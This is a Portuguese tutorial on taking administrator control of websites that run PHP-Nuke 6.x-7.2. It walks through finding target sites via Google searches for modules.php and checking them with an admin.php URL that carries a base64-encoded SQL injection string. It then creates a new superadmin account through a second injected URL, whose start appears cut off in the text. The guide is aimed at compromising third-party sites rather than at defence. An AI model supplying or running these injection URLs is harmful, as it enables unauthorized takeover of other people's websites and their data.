Tutoriais
Adquirindo Admin-level em PHP-Nuke 6.x-7.2
OBS: não lembro onde arrumei esse texto !
Adquirindo Admin-level em PHP-Nuke 6.x-7.2
1. Encontrando sites rodando PHP-Nuke.
2. Verificando se o site está realmente bugado.
3. Criando novo admin para o site, para que você possa ter acesso total ao site.
Agora vou explicar detalhamente como fazer cada passo do processo de adquirir Admin-level em PHP-Nuke 6.x-7.2 detalhadamente.
Passo 1 -> Encontrando sites rodando PHP-Nuke.
Normalmente as páginas que contém o arquivo modules.php
estão rodando PHP-Nuke, no nosso caso procuramos no google e
achamos a página http://site.bugado/ pode haver um ou mais diretórios
aki, ou não, o que importa é onde o modules.php se encontra
/modules.php .
http://site.bugado/phpnuke/modules.php
ou http://site.bugado/phpnuke/modules.php?op=download
(ou op=[qq coisa], como disse o que importa é o diretorio onde
se encontra o modules.php)
Então para nós o diretório onde se encontra o modules.php é o 'http://site.bugado/phpnuke' que é o mesmo diretório do arquivo admin.php
Passo 1 End.
Passo 2 -> Verificando se o site está realmente bugado.
É
facim, basta adicionar uma string no admin.php e ver se você conseguiu
se comunicar com a database.
Essa string é 'admin.php?bestchan=hackerclub&admin=eCcgT1IvKjp5'. Como nosso diretório é o 'http://site.bugado/phpnuke' ficaria assim: http://site.bugado/phpnukeadmin.php?bestchan=hackerclub&admin=eCcgT1IvKjp5 .
Basta entrar nessa URL para ver se está bugado, se estiver bugado deverá aparecer a mensagem "Selection from database failed!" (sem áspas).
Se aparecer qualquer outra coisa que não seja somente "Selection from database failed!" o site naum está bugado.
Passo 2 End.
Passo 3 -> Criando novo admin para o site, para que você possa
ter acesso total ao site.
Essa é a parte fácil do processo, é só entrar
em um link com seus desejados dados que você criará um
novo admin para o site.
God&add_pwd=Senha&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Onde: Nick = Novo nick de admin
Senha = Senha do novo admin
Pronto, após este passo você irá para a página de logon dos admin, se não pegar é porque o site não está vulnerável, é só se logar e você terá acesso total ao site.